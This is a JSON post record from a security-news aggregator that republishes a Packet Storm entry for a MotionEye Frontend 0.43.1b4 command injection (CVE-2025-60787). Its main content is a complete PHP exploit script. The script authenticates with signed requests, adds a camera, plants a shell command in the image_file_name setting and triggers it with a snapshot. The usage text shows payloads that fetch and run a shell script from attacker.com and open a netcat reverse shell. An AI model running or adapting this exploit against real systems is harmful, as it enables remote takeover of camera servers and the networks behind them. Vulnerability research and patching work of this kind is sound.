{"id":39065,"date":"2026-02-04T11:50:03","date_gmt":"2026-02-04T11:50:03","guid":{"rendered":"http:\/\/localhost\/?p=39065"},"modified":"2026-02-04T11:50:03","modified_gmt":"2026-02-04T11:50:03","slug":"motioneye-frontend-0431b4-command-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=39065","title":{"rendered":"\ud83d\udcc4 MotionEye Frontend 0.43.1b4 Command Injection_PACKETSTORM:214899"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-04T17:00:15&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit for a command injection vulnerability in MotionEye Frontend version 0.43.1b4&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-04T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-04T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 MotionEye Frontend 0.43.1b4 Command Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:214899&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-60787&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : MotionEye Frontend 0.43.1b4 RCE                                                                                             |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/github.com\/motioneye-project\/motioneye                                                                              |\\n    =============================================================================================================================================\\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/210394\/ \\u0026 \\tCVE-2025-60787\\n    \\n    [+] Summary    : Command Injection in Configuration Files &#8211; Unsanitized user input in the image_file_name parameter \\n                     allows authenticated attackers to inject OS commands via $(command) syntax, leading to remote code execution.\\n    \\n    [+] POC :\\n    \\n    php motioneye_rce.php check https:\/\/target-motioneye.local\\n    \\n    php motioneye_rce.php check https:\/\/192.168.1.100 admin password123\\n    \\n    \\u003c?php\\n    \\n    \\n    class MotionEyeRCE {\\n        private $target;\\n        private $username;\\n        private $password;\\n        private $uri;\\n        private $cookies;\\n        private $timeout = 30;\\n        private $verify_ssl = false;\\n        private $camera_id;\\n        \\n        public function __construct($target, $username = &#8216;admin&#8217;, $password = &#8221;) {\\n            $this-\\u003etarget = rtrim($target, &#8216;\/&#8217;);\\n            $this-\\u003eusername = $username;\\n            $this-\\u003epassword = $password;\\n            $this-\\u003ecookies = [];\\n            $this-\\u003ecamera_id = null;\\n        }\\n        \\n        \/**\\n         * Clean string according to MotionEye&#8217;s canonicalization rules\\n         *\/\\n        private function clean_string($data) {\\n            if ($data === null) {\\n                return &#8221;;\\n            }\\n            \\n            if (!is_string($data)) {\\n                $data = (string)$data;\\n            }\\n            \\n            \/\/ Regex from MotionEye source code\\n            $signature_regex = &#8216;\/[^A-Za-z0-9\\\\\/?_.=\\u0026{}\\\\[\\\\]\\&#8221;:, -]\/&#8217;;\\n            return preg_replace($signature_regex, &#8216;-&#8216;, $data);\\n        }\\n        \\n        \/**\\n         * Compute SHA1 signature for MotionEye requests\\n         *\/\\n        private function compute_signature($method, $path, $body = null, $key = &#8221;) {\\n            \/\/ Parse URL\\n            $parsed = parse_url($path);\\n            $path_only = $parsed[&#8216;path&#8217;] ?? &#8221;;\\n            $query_str = $parsed[&#8216;query&#8217;] ?? &#8221;;\\n            \\n            \/\/ Parse query parameters\\n            $query_params = [];\\n            if ($query_str) {\\n                parse_str($query_str, $query_params);\\n            }\\n            \\n            \/\/ Remove _signature parameter\\n            unset($query_params[&#8216;_signature&#8217;]);\\n            \\n            \/\/ Sort parameters alphabetically\\n            ksort($query_params);\\n            \\n            \/\/ Build canonical query string\\n            $canonical_query = &#8221;;\\n            foreach ($query_params as $k =\\u003e $v) {\\n                if ($canonical_query !== &#8221;) {\\n                    $canonical_query .= &#8216;\\u0026&#8217;;\\n                }\\n                $canonical_query .= $k . &#8216;=&#8217; . rawurlencode($v);\\n            }\\n            \\n            \/\/ Build canonical path\\n            $canonical_path = $path_only;\\n            if ($canonical_query !== &#8221;) {\\n                $canonical_path .= &#8216;?&#8217; . $canonical_query;\\n            }\\n            \\n            \/\/ Clean path and body\\n            $cleaned_path = $this-\\u003eclean_string($canonical_path);\\n            $cleaned_body = $this-\\u003eclean_string($body);\\n            \\n            \/\/ Compute key hash\\n            $key_hash = strtolower(sha1($key));\\n            \\n            \/\/ Build data to hash\\n            $data = $method . &#8216;:&#8217; . $cleaned_path . &#8216;:&#8217; . $cleaned_body . &#8216;:&#8217; . $key_hash;\\n            \\n            return strtolower(sha1($data));\\n        }\\n        \\n        \/**\\n         * Generate timestamp in milliseconds\\n         *\/\\n        private function generate_timestamp_ms() {\\n            return (int)(microtime(true) * 1000);\\n        }\\n        \\n        \/**\\n         * Send HTTP request with MotionEye signature\\n         *\/\\n        private function send_signed_request($method, $path, $data = null, $headers = []) {\\n            $url = $this-\\u003etarget . $path;\\n            \\n            \/\/ Add required GET parameters\\n            $get_params = [\\n                &#8216;_username&#8217; =\\u003e $this-\\u003eusername,\\n                &#8216;_&#8217; =\\u003e $this-\\u003egenerate_timestamp_ms()\\n            ];\\n            \\n            \/\/ Parse existing query string if present\\n            $parsed = parse_url($url);\\n            $base_url = $parsed[&#8216;scheme&#8217;] . &#8216;:\/\/&#8217; . $parsed[&#8216;host&#8217;] . ($parsed[&#8216;port&#8217;] ? &#8216;:&#8217; . $parsed[&#8216;port&#8217;] : &#8221;) . $parsed[&#8216;path&#8217;];\\n            $existing_query = [];\\n            \\n            if (isset($parsed[&#8216;query&#8217;])) {\\n                parse_str($parsed[&#8216;query&#8217;], $existing_query);\\n                $get_params = array_merge($get_params, $existing_query);\\n            }\\n            \\n            \/\/ Build query string\\n            $query_str = http_build_query($get_params);\\n            $path_with_query = $parsed[&#8216;path&#8217;] . &#8216;?&#8217; . $query_str;\\n            \\n            \/\/ Compute signature\\n            $signature = $this-\\u003ecompute_signature(\\n                strtoupper($method),\\n                $path_with_query,\\n                $data,\\n                $this-\\u003epassword\\n            );\\n            \\n            \/\/ Add signature to query parameters\\n            $get_params[&#8216;_signature&#8217;] = $signature;\\n            $query_str = http_build_query($get_params);\\n            \\n            \/\/ Build final URL\\n            $final_url = $base_url . &#8216;?&#8217; . $query_str;\\n            \\n            \/\/ Prepare request\\n            $ch = curl_init();\\n            \\n            $options = [\\n                CURLOPT_URL =\\u003e $final_url,\\n                CURLOPT_RETURNTRANSFER =\\u003e true,\\n                CURLOPT_TIMEOUT =\\u003e $this-\\u003etimeout,\\n                CURLOPT_FOLLOWLOCATION =\\u003e true,\\n                CURLOPT_MAXREDIRS =\\u003e 5,\\n                CURLOPT_SSL_VERIFYPEER =\\u003e $this-\\u003everify_ssl,\\n                CURLOPT_SSL_VERIFYHOST =\\u003e $this-\\u003everify_ssl ? 2 : 0,\\n                CURLOPT_HEADER =\\u003e true,\\n                CURLOPT_USERAGENT =\\u003e &#8216;Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36&#8217;,\\n                CURLOPT_HTTPHEADER =\\u003e array_merge([\\n                    &#8216;Accept: application\/json,text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8&#8217;,\\n                    &#8216;Accept-Language: en-US,en;q=0.5&#8217;,\\n                    &#8216;Connection: close&#8217;\\n                ], $headers)\\n            ];\\n            \\n            if (strtoupper($method) === &#8216;POST&#8217;) {\\n                $options[CURLOPT_POST] = true;\\n                if ($data !== null) {\\n                    $options[CURLOPT_POSTFIELDS] = $data;\\n                    \\n                    \/\/ Detect content type\\n                    if (is_array($data)) {\\n                        $options[CURLOPT_POSTFIELDS] = http_build_query($data);\\n                        $options[CURLOPT_HTTPHEADER][] = &#8216;Content-Type: application\/x-www-form-urlencoded&#8217;;\\n                    } else {\\n                        $options[CURLOPT_POSTFIELDS] = $data;\\n                        if (json_decode($data) !== null) {\\n                            $options[CURLOPT_HTTPHEADER][] = &#8216;Content-Type: application\/json&#8217;;\\n                        }\\n                    }\\n                }\\n            }\\n            \\n            \/\/ Add cookies if any\\n            if (!empty($this-\\u003ecookies)) {\\n                $cookie_str = &#8221;;\\n                foreach ($this-\\u003ecookies as $name =\\u003e $value) {\\n                    $cookie_str .= $name . &#8216;=&#8217; . $value . &#8216;; &#8216;;\\n                }\\n                $options[CURLOPT_COOKIE] = rtrim($cookie_str, &#8216;; &#8216;);\\n            }\\n            \\n            curl_setopt_array($ch, $options);\\n            \\n            $response = curl_exec($ch);\\n            $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n            $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);\\n            $error = curl_error($ch);\\n            \\n            curl_close($ch);\\n            \\n            if ($response === false) {\\n                throw new Exception(\\&#8221;cURL error: \\&#8221; . $error);\\n            }\\n            \\n            $headers = substr($response, 0, $header_size);\\n            $body = substr($response, $header_size);\\n            \\n            \/\/ Extract and store cookies\\n            preg_match_all(&#8216;\/^Set-Cookie:\\\\s*([^;]*)\/mi&#8217;, $headers, $matches);\\n            foreach ($matches[1] as $cookie) {\\n                $parts = explode(&#8216;=&#8217;, $cookie, 2);\\n                if (count($parts) == 2) {\\n                    $this-\\u003ecookies[$parts[0]] = $parts[1];\\n                }\\n            }\\n            \\n            return [\\n                &#8216;code&#8217; =\\u003e $http_code,\\n                &#8216;headers&#8217; =\\u003e $headers,\\n                &#8216;body&#8217; =\\u003e $body\\n            ];\\n        }\\n        \\n        \/**\\n         * Check if target is vulnerable\\n         *\/\\n        public function check() {\\n            try {\\n                $ch = curl_init($this-\\u003etarget);\\n                curl_setopt_array($ch, [\\n                    CURLOPT_RETURNTRANSFER =\\u003e true,\\n                    CURLOPT_TIMEOUT =\\u003e $this-\\u003etimeout,\\n                    CURLOPT_SSL_VERIFYPEER =\\u003e $this-\\u003everify_ssl,\\n                    CURLOPT_SSL_VERIFYHOST =\\u003e $this-\\u003everify_ssl ? 2 : 0,\\n                    CURLOPT_FOLLOWLOCATION =\\u003e true,\\n                    CURLOPT_USERAGENT =\\u003e &#8216;Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36&#8217;\\n                ]);\\n                \\n                $response = curl_exec($ch);\\n                $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n                curl_close($ch);\\n                \\n                if ($http_code !== 200) {\\n                    return [&#8216;vulnerable&#8217; =\\u003e false, &#8216;message&#8217; =\\u003e &#8216;Target not reachable or not MotionEye&#8217;];\\n                }\\n                \\n                \/\/ Look for motionEye version\\n                if (preg_match(&#8216;\/motionEye Version.*?\\u003cspan[^\\u003e]*\\u003e([^\\u003c]+)\\u003c\/&#8217;, $response, $matches)) {\\n                    $version = trim($matches[1]);\\n                    $clean_version = preg_replace(&#8216;\/[a-zA-Z]\/&#8217;, &#8221;, $version);\\n                    \\n                    if (version_compare($clean_version, &#8216;0.43.15&#8217;, &#8216;\\u003c&#8217;)) {\\n                        return [\\n                            &#8216;vulnerable&#8217; =\\u003e true,\\n                            &#8216;message&#8217; =\\u003e \\&#8221;Vulnerable version detected: $version\\&#8221;,\\n                            &#8216;version&#8217; =\\u003e $version\\n                        ];\\n                    } else {\\n                        return [\\n                            &#8216;vulnerable&#8217; =\\u003e &#8216;unknown&#8217;,\\n                            &#8216;message&#8217; =\\u003e \\&#8221;Newer version detected: $version. Check release notes.\\&#8221;,\\n                            &#8216;version&#8217; =\\u003e $version\\n                        ];\\n                    }\\n                }\\n                \\n                return [&#8216;vulnerable&#8217; =\\u003e false, &#8216;message&#8217; =\\u003e &#8216;MotionEye version not found&#8217;];\\n                \\n            } catch (Exception $e) {\\n                return [&#8216;vulnerable&#8217; =\\u003e false, &#8216;message&#8217; =\\u003e &#8216;Error: &#8216; . $e-\\u003egetMessage()];\\n            }\\n        }\\n        \\n        \/**\\n         * Add a camera to MotionEye\\n         *\/\\n        private function add_camera() {\\n            echo \\&#8221;[+] Adding malicious camera&#8230;\\\\n\\&#8221;;\\n            \\n            $data = json_encode([\\n                &#8216;scheme&#8217; =\\u003e &#8216;rstp&#8217;,\\n                &#8216;host&#8217; =\\u003e $this-\\u003egenerate_ip(),\\n                &#8216;port&#8217; =\\u003e &#8221;,\\n                &#8216;path&#8217; =\\u003e &#8216;\/&#8217;,\\n                &#8216;username&#8217; =\\u003e &#8221;,\\n                &#8216;proto&#8217; =\\u003e &#8216;netcam&#8217;\\n            ]);\\n            \\n            $response = $this-\\u003esend_signed_request(\\n                &#8216;POST&#8217;,\\n                &#8216;\/config\/add\/&#8217;,\\n                $data,\\n                [&#8216;Content-Type: application\/json&#8217;]\\n            );\\n            \\n            if ($response[&#8216;code&#8217;] !== 200) {\\n                throw new Exception(\\&#8221;Failed to add camera. HTTP {$response[&#8216;code&#8217;]}\\&#8221;);\\n            }\\n            \\n            $json = json_decode($response[&#8216;body&#8217;], true);\\n            if (!$json || !isset($json[&#8216;id&#8217;])) {\\n                throw new Exception(\\&#8221;Invalid response when adding camera\\&#8221;);\\n            }\\n            \\n            $this-\\u003ecamera_id = $json[&#8216;id&#8217;];\\n            echo \\&#8221;[+] Camera added successfully (ID: {$this-\\u003ecamera_id})\\\\n\\&#8221;;\\n            \\n            return $this-\\u003ecamera_id;\\n        }\\n        \\n        \/**\\n         * Configure camera with payload\\n         *\/\\n        private function configure_camera($payload) {\\n            echo \\&#8221;[+] Configuring camera with payload&#8230;\\\\n\\&#8221;;\\n            \\n            $camera_name = &#8216;cam_&#8217; . bin2hex(random_bytes(4));\\n            $config = [\\n                &#8216;enabled&#8217; =\\u003e true,\\n                &#8216;name&#8217; =\\u003e $camera_name,\\n                &#8216;proto&#8217; =\\u003e &#8216;netcam&#8217;,\\n                &#8216;auto_brightness&#8217; =\\u003e false,\\n                &#8216;rotation&#8217; =\\u003e [0, 90, 180, 270][rand(0, 3)],\\n                &#8216;framerate&#8217; =\\u003e rand(2, 30),\\n                &#8216;privacy_mask&#8217; =\\u003e false,\\n                &#8216;storage_device&#8217; =\\u003e &#8216;custom-path&#8217;,\\n                &#8216;root_directory&#8217; =\\u003e \\&#8221;\/var\/lib\/motioneye\/{$camera_name}\\&#8221;,\\n                &#8216;upload_enabled&#8217; =\\u003e false,\\n                &#8216;upload_picture&#8217; =\\u003e false,\\n                &#8216;upload_movie&#8217; =\\u003e false,\\n                &#8216;upload_service&#8217; =\\u003e [&#8216;ftp&#8217;, &#8216;sftp&#8217;, &#8216;webdav&#8217;][rand(0, 2)],\\n                &#8216;upload_method&#8217; =\\u003e [&#8216;post&#8217;, &#8216;put&#8217;][rand(0, 1)],\\n                &#8216;upload_subfolders&#8217; =\\u003e false,\\n                &#8216;web_hook_storage_enabled&#8217; =\\u003e false,\\n                &#8216;command_storage_enabled&#8217; =\\u003e false,\\n                &#8216;text_overlay&#8217; =\\u003e false,\\n                &#8216;text_scale&#8217; =\\u003e rand(1, 3),\\n                &#8216;video_streaming&#8217; =\\u003e false,\\n                &#8216;streaming_framerate&#8217; =\\u003e rand(5, 30),\\n                &#8216;streaming_quality&#8217; =\\u003e rand(50, 95),\\n                &#8216;streaming_resolution&#8217; =\\u003e rand(50, 95),\\n                &#8216;streaming_server_resize&#8217; =\\u003e false,\\n                &#8216;streaming_port&#8217; =\\u003e &#8216;9081&#8217;,\\n                &#8216;streaming_auth_mode&#8217; =\\u003e &#8216;disabled&#8217;,\\n                &#8216;streaming_motion&#8217; =\\u003e false,\\n                &#8216;still_images&#8217; =\\u003e true,\\n                &#8216;image_file_name&#8217; =\\u003e \\&#8221;$({$payload})\\&#8221;,  \/\/ Payload injection point\\n                &#8216;image_quality&#8217; =\\u003e rand(50, 95),\\n                &#8216;capture_mode&#8217; =\\u003e &#8216;manual&#8217;,\\n                &#8216;preserve_pictures&#8217; =\\u003e &#8216;0&#8217;,\\n                &#8216;manual_snapshots&#8217; =\\u003e true,\\n                &#8216;movies&#8217; =\\u003e false,\\n                &#8216;movie_file_name&#8217; =\\u003e &#8216;%Y-%m-%d\/%H-%M-%S&#8217;,\\n                &#8216;movie_quality&#8217; =\\u003e rand(50, 95),\\n                &#8216;movie_format&#8217; =\\u003e &#8216;mp4 =\\u003e h264_v4l2m2m&#8217;,\\n                &#8216;movie_passthrough&#8217; =\\u003e false,\\n                &#8216;recording_mode&#8217; =\\u003e &#8216;motion-triggered&#8217;,\\n                &#8216;max_movie_length&#8217; =\\u003e &#8216;0&#8217;,\\n                &#8216;preserve_movies&#8217; =\\u003e &#8216;0&#8217;,\\n                &#8216;motion_detection&#8217; =\\u003e false,\\n                &#8216;frame_change_threshold&#8217; =\\u003e &#8216;0.&#8217; . rand(1000000000000000, 9999999999999999),\\n                &#8216;max_frame_change_threshold&#8217; =\\u003e rand(0, 1),\\n                &#8216;auto_threshold_tuning&#8217; =\\u003e false,\\n                &#8216;auto_noise_detect&#8217; =\\u003e false,\\n                &#8216;noise_level&#8217; =\\u003e rand(10, 32),\\n                &#8216;light_switch_detect&#8217; =\\u003e &#8216;0&#8217;,\\n                &#8216;despeckle_filter&#8217; =\\u003e false,\\n                &#8216;event_gap&#8217; =\\u003e rand(5, 30),\\n                &#8216;pre_capture&#8217; =\\u003e rand(1, 5),\\n                &#8216;post_capture&#8217; =\\u003e rand(1, 5),\\n                &#8216;minimum_motion_frames&#8217; =\\u003e rand(20, 30),\\n                &#8216;motion_mask&#8217; =\\u003e false,\\n                &#8216;show_frame_changes&#8217; =\\u003e false,\\n                &#8216;create_debug_media&#8217; =\\u003e false,\\n                &#8217;email_notifications_enabled&#8217; =\\u003e false,\\n                &#8216;telegram_notifications_enabled&#8217; =\\u003e false,\\n                &#8216;web_hook_notifications_enabled&#8217; =\\u003e false,\\n                &#8216;web_hook_end_notifications_enabled&#8217; =\\u003e false,\\n                &#8216;command_notifications_enabled&#8217; =\\u003e false,\\n                &#8216;command_end_notifications_enabled&#8217; =\\u003e false,\\n                &#8216;working_schedule&#8217; =\\u003e false,\\n                &#8216;resolution&#8217; =\\u003e [&#8216;320&#215;240&#8217;, &#8216;640&#215;480&#8217;, &#8216;1280&#215;720&#8217;][rand(0, 2)]\\n            ];\\n            \\n            $data = json_encode([$this-\\u003ecamera_id =\\u003e $config]);\\n            \\n            $response = $this-\\u003esend_signed_request(\\n                &#8216;POST&#8217;,\\n                &#8216;\/config\/0\/set\/&#8217;,\\n                $data,\\n                [&#8216;Content-Type: application\/json&#8217;]\\n            );\\n            \\n            if ($response[&#8216;code&#8217;] !== 200) {\\n                throw new Exception(\\&#8221;Failed to configure camera. HTTP {$response[&#8216;code&#8217;]}\\&#8221;);\\n            }\\n            \\n            echo \\&#8221;[+] Camera configured with payload\\\\n\\&#8221;;\\n        }\\n        \\n        \/**\\n         * Trigger the exploit by taking a snapshot\\n         *\/\\n        private function trigger_exploit() {\\n            echo \\&#8221;[+] Triggering exploit&#8230;\\\\n\\&#8221;;\\n            \\n            $response = $this-\\u003esend_signed_request(\\n                &#8216;POST&#8217;,\\n                \\&#8221;\/action\/{$this-\\u003ecamera_id}\/snapshot\/\\&#8221;,\\n                &#8216;null&#8217;,\\n                [&#8216;Content-Type: application\/json&#8217;]\\n            );\\n            \\n            if ($response[&#8216;code&#8217;] !== 200) {\\n                throw new Exception(\\&#8221;Failed to trigger exploit. HTTP {$response[&#8216;code&#8217;]}\\&#8221;);\\n            }\\n            \\n            echo \\&#8221;[+] Exploit triggered\\\\n\\&#8221;;\\n        }\\n        \\n        \/**\\n         * Remove the camera\\n         *\/\\n        private function remove_camera() {\\n            if (!$this-\\u003ecamera_id) {\\n                return;\\n            }\\n            \\n            echo \\&#8221;[+] Removing camera&#8230;\\\\n\\&#8221;;\\n            \\n            try {\\n                $response = $this-\\u003esend_signed_request(\\n                    &#8216;POST&#8217;,\\n                    \\&#8221;\/config\/{$this-\\u003ecamera_id}\/rem\/\\&#8221;,\\n                    &#8216;null&#8217;,\\n                    [&#8216;Content-Type: application\/json&#8217;]\\n                );\\n                \\n                if ($response[&#8216;code&#8217;] === 200) {\\n                    echo \\&#8221;[+] Camera removed successfully\\\\n\\&#8221;;\\n                }\\n            } catch (Exception $e) {\\n                echo \\&#8221;[-] Error removing camera: \\&#8221; . $e-\\u003egetMessage() . \\&#8221;\\\\n\\&#8221;;\\n            }\\n            \\n            $this-\\u003ecamera_id = null;\\n        }\\n        \\n        \/**\\n         * Generate random IP address\\n         *\/\\n        private function generate_ip() {\\n            return rand(1, 254) . &#8216;.&#8217; . rand(0, 254) . &#8216;.&#8217; . rand(0, 254) . &#8216;.&#8217; . rand(1, 254);\\n        }\\n        \\n        \/**\\n         * Execute exploit\\n         *\/\\n        public function exploit($payload) {\\n            try {\\n                \/\/ Check target first\\n                $check = $this-\\u003echeck();\\n                if (!$check[&#8216;vulnerable&#8217;]) {\\n                    echo \\&#8221;[-] Target appears not to be vulnerable: \\&#8221; . $check[&#8216;message&#8217;] . \\&#8221;\\\\n\\&#8221;;\\n                    return false;\\n                }\\n                \\n                echo \\&#8221;[+] Target appears to be vulnerable\\\\n\\&#8221;;\\n                \\n                \/\/ Add camera\\n                $this-\\u003eadd_camera();\\n                \\n                \/\/ Configure with payload\\n                $this-\\u003econfigure_camera($payload);\\n                \\n                \/\/ Trigger exploit\\n                $this-\\u003etrigger_exploit();\\n                \\n                echo \\&#8221;[+] Exploit completed. Check for callback.\\\\n\\&#8221;;\\n                \\n                return true;\\n                \\n            } catch (Exception $e) {\\n                echo \\&#8221;[-] Exploit failed: \\&#8221; . $e-\\u003egetMessage() . \\&#8221;\\\\n\\&#8221;;\\n                \\n                \/\/ Clean up\\n                $this-\\u003eremove_camera();\\n                \\n                return false;\\n            }\\n        }\\n        \\n        \/**\\n         * Clean up resources\\n         *\/\\n        public function cleanup() {\\n            $this-\\u003eremove_camera();\\n        }\\n        \\n        public function __destruct() {\\n            $this-\\u003ecleanup();\\n        }\\n    }\\n    \\n    \/**\\n     * Command-line interface\\n     *\/\\n    if (php_sapi_name() === &#8216;cli&#8217;) {\\n        if ($argc \\u003c 2) {\\n            echo \\&#8221;MotionEye RCE Exploit (CVE-2025-60787)\\\\n\\&#8221;;\\n            echo \\&#8221;Usage:\\\\n\\&#8221;;\\n            echo \\&#8221;  php {$argv[0]} check \\u003curl\\u003e [username] [password]\\\\n\\&#8221;;\\n            echo \\&#8221;  php {$argv[0]} exploit \\u003curl\\u003e \\u003cpayload\\u003e [username] [password]\\\\n\\&#8221;;\\n            echo \\&#8221;\\\\nExamples:\\\\n\\&#8221;;\\n            echo \\&#8221;  php {$argv[0]} check https:\/\/192.168.1.100\\\\n\\&#8221;;\\n            echo \\&#8221;  php {$argv[0]} exploit https:\/\/192.168.1.100 &#8216;curl http:\/\/attacker.com\/shell.sh|sh&#8217;\\\\n\\&#8221;;\\n            echo \\&#8221;  php {$argv[0]} exploit https:\/\/192.168.1.100 &#8216;nc -e \/bin\/bash 192.168.1.50 4444&#8217; admin password123\\\\n\\&#8221;;\\n            exit(1);\\n        }\\n        \\n        $command = $argv[1];\\n        $url = $argv[2] ?? &#8221;;\\n        \\n        if ($command === &#8216;check&#8217;) {\\n            $username = $argv[3] ?? &#8216;admin&#8217;;\\n            $password = $argv[4] ?? &#8221;;\\n            \\n            $exploit = new MotionEyeRCE($url, $username, $password);\\n            $result = $exploit-\\u003echeck();\\n            \\n            echo \\&#8221;Target: $url\\\\n\\&#8221;;\\n            echo \\&#8221;Status: \\&#8221; . $result[&#8216;message&#8217;] . \\&#8221;\\\\n\\&#8221;;\\n            if (isset($result[&#8216;version&#8217;])) {\\n                echo \\&#8221;Version: \\&#8221; . $result[&#8216;version&#8217;] . \\&#8221;\\\\n\\&#8221;;\\n            }\\n            \\n        } elseif ($command === &#8216;exploit&#8217;) {\\n            $payload = $argv[3] ?? &#8221;;\\n            $username = $argv[4] ?? &#8216;admin&#8217;;\\n            $password = $argv[5] ?? &#8221;;\\n            \\n            if (!$payload) {\\n                echo \\&#8221;[-] Payload required for exploit command\\\\n\\&#8221;;\\n                exit(1);\\n            }\\n            \\n            $exploit = new MotionEyeRCE($url, $username, $password);\\n            $exploit-\\u003eexploit($payload);\\n            \\n        } else {\\n            echo \\&#8221;[-] Unknown command: $command\\\\n\\&#8221;;\\n            exit(1);\\n        }\\n    }\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/214899&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:7.2,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:H\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/214899\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-04T17:00:15&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit for a command injection vulnerability in MotionEye Frontend version 0.43.1b4&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-04T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-04T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 MotionEye Frontend 0.43.1b4 Command Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:214899&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-60787&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n | # Title : MotionEye Frontend&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,39,12,15,13,53,7,11,5],"class_list":["post-39065","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-72","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 MotionEye Frontend 0.43.1b4 Command Injection_PACKETSTORM:214899 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=39065\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 MotionEye Frontend 0.43.1b4 Command Injection_PACKETSTORM:214899 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-04T17:00:15&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit for a command injection vulnerability in MotionEye Frontend version 0.43.1b4&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-04T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-04T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 MotionEye Frontend 0.43.1b4 Command 